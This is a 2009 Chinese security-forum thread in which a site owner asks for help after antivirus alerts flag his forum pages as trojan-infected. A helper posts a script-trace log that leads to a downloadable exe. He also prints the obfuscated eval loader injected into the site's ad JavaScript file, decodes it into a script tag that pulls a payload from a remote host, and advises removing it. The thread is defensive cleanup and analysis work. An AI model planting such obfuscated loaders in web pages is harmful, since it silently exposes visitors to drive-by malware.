瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 瑞星云安全网站联盟专版 » 网站提示有木马 检查不到 挂马文件 斑竹帮忙看看
小椴 - 2009-12-31 15:04:00
网页:http://www.xiugoo.com/bbs/thread-306912-1-1.html
检测时间:2009-12-31 14:16:020
木马网址:
http://infi.8800.org/data/backup/yx
shellcode溢出攻击
解决方案



网页:http://www.xiugoo.com/bbs/thread-805670-1-1.html
检测时间:2009-12-31 14:15:59
木马网址:
http://infi.8800.org/data/backup/yx
shellcode溢出攻击
解决方案



网页:http://www.xiugoo.com/bbs/thread-406072-1-1.html
检测时间:2009-12-31 14:15:54
木马网址:
http://infi.8800.org/data/backup/yx
shellcode溢出攻击
解决方案



网页:http://www.xiugoo.com/bbs/thread-784378-1-1.html
检测时间:2009-12-31 14:15:55
木马网址:
http://infi.8800.org/data/backup/yx
shellcode溢出攻击
解决方案



网页:http://www.xiugoo.com/bbs/thread-856716-1-1.html
检测时间:2009-12-31 13:45:12
木马网址:
http://infi.8800.org/data/backup/yx

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
networkedition - 2009-12-31 15:08:00
是被挂马了。
Log generated by networkedition use mdecoder 0.30
[root]http://www.xiugoo.com/bbs/thread-306912-1-1.html
    [script]http://www.xiugoo.com/bbs/include/js/common.js?2n3
    [script]http://cpro.baidu.com/cpro/ui/cp.js
    [script]http://www.xiugoo.com/bbs/include/js/viewthread.js?2n3
    [script]http://cpro.baidu.com/cpro/ui/cp.js
    [script]http://cpro.baidu.com/cpro/ui/cp.js
    [script]http://www.xiugoo.com/bbs/include/js/checkurl.js?2n3
    [script]http://www.xiugoo.com/bbs/ad-xg/ad-js/ad_qqxxxx.js
        [script]http://ad.googlesyndications.co.cc/data/backup/yx/images.png?sxs
            [iframe]http://infi.8800.org/data/backup/yx/data.htm?12
                [exe]http://ad.googlesyndications.co.cc/data/r1.exe
    [script]http://u.1133.cc/showpage.php?pid=136091&show_t=2
    [script]http://u.1133.cc/showpage.php?pid=130136&show_t=2
    [script]http://u.1133.cc/showpage.php?pid=130137&show_t=2
        [script]http://code06js.1133.cc/pds_k/pagejs/webgroup130137.js
小椴 - 2009-12-31 15:09:00
是哪个文件被挂马呢! 找不到!!!
networkedition - 2009-12-31 15:11:00
http://www.xiugoo.com/bbs/ad-xg/ad-js/ad_qqxxxx.js
这个js里面有个eval

[复制到剪贴板]
CODE:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5.6(\'<0 4=3://1.2.7.8/e/d/c/b.9?a></0>\');',15,15,'script|ad|googlesyndications|http|src|document|write|co|cc|png|sxs|images|yx|backup|data'.split('|'),0,{}));}


小椴 - 2009-12-31 15:17:00
网站里面的 这个文件 和 下载的 文件 明明不一样! 怎么会呢??
小椴 - 2009-12-31 15:19:00
有什么办法可以查 这个文件是怎么被修改的吗?
networkedition - 2009-12-31 15:31:00
那个是被加密呀,你删除整个那段代码呀:kaka6:
eval解密出是这个:
<script src=http://ad.googlesyndications.co.cc/data/backup/yx/images.png?sxs></script>;;}
小椴 - 2009-12-31 16:00:00
恩 奇怪的事情是 这个文件 不知道是怎么来的 有什么办法 查文件是如何来的吗? 要不然 后门也找不到!
networkedition - 2009-12-31 16:43:00
服务器有漏洞了吧,自行检查吧,还有就是查看一下网站的页面代码是否有漏洞之类的。
飞舟 - 2010-1-4 0:01:00
:kaka6: 看修改日期。一般是js文件被修改
1
查看完整版本: 网站提示有木马 检查不到 挂马文件 斑竹帮忙看看
© 2000 - 2025 Rising Corp. Ltd.